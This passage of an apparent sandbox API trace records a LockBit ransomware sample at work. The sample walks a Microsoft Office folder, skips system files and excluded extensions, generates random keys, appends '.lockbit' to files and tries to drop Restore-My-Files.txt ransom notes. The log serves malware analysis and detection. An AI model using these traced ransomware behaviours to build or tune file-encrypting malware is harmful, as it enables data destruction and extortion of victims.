(in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.110] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.110] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.110] free (_Block=0x1fa2ed8) [0203.110] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10336_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.110] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.110] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.110] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x604e8e00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x604e8e00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10337_.GIF", cAlternateFileName="")) returned 1 [0203.111] lstrcmpiW (lpString1=".", lpString2="BD10337_.GIF") returned -1 [0203.111] lstrcmpiW (lpString1="..", lpString2="BD10337_.GIF") returned -1 [0203.111] PathFindExtensionW (pszPath="BD10337_.GIF") returned=".GIF" [0203.111] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.111] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.111] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.112] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.112] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.112] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.112] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.112] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10337_.GIF") returned 1 [0203.112] lstrcmpiW (lpString1="ntldr", lpString2="BD10337_.GIF") returned 1 [0203.113] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10337_.GIF") returned 1 [0203.113] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10337_.GIF") returned 1 [0203.113] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10337_.GIF") returned -1 [0203.113] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10337_.GIF") returned 1 [0203.113] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10337_.GIF") returned 1 [0203.113] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.113] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF") returned=".GIF" [0203.113] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.113] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.113] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.113] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.114] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.114] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.114] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF.lockbit") returned 78 [0203.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10337_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.116] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.117] malloc (_Size=0x40068) returned 0x3df0008 [0203.117] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=240) returned 1 [0203.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.133] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.138] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.138] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.139] free (_Block=0x1fa2ed8) [0203.139] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10337_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.139] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.139] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebfa00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb7ebfa00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14513_.GIF", cAlternateFileName="")) returned 1 [0203.139] lstrcmpiW (lpString1=".", lpString2="BD14513_.GIF") returned -1 [0203.139] lstrcmpiW (lpString1="..", lpString2="BD14513_.GIF") returned -1 [0203.139] PathFindExtensionW (pszPath="BD14513_.GIF") returned=".GIF" [0203.139] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.139] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.139] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.139] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.139] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.139] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.140] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.140] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.140] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.140] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.140] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.140] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.140] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14513_.GIF") returned 1 [0203.141] lstrcmpiW (lpString1="ntldr", lpString2="BD14513_.GIF") returned 1 [0203.141] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14513_.GIF") returned 1 [0203.141] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14513_.GIF") returned 1 [0203.141] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14513_.GIF") returned -1 [0203.141] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14513_.GIF") returned 1 [0203.141] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14513_.GIF") returned 1 [0203.141] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.141] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF") returned=".GIF" [0203.141] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.141] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.141] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.142] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.142] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.142] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.142] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.142] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.142] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.142] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.142] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF.lockbit") returned 78 [0203.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14513_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.145] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.145] malloc (_Size=0x40068) returned 0x3df0008 [0203.145] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=206) returned 1 [0203.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.146] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.151] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.151] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.151] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.151] free (_Block=0x1fa2ed8) [0203.151] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14513_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.151] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.151] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91d2700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb91d2700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14514_.GIF", cAlternateFileName="")) returned 1 [0203.151] lstrcmpiW (lpString1=".", lpString2="BD14514_.GIF") returned -1 [0203.151] lstrcmpiW (lpString1="..", lpString2="BD14514_.GIF") returned -1 [0203.151] PathFindExtensionW (pszPath="BD14514_.GIF") returned=".GIF" [0203.152] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.152] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.152] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14514_.GIF") returned 1 [0203.153] lstrcmpiW (lpString1="ntldr", lpString2="BD14514_.GIF") returned 1 [0203.153] 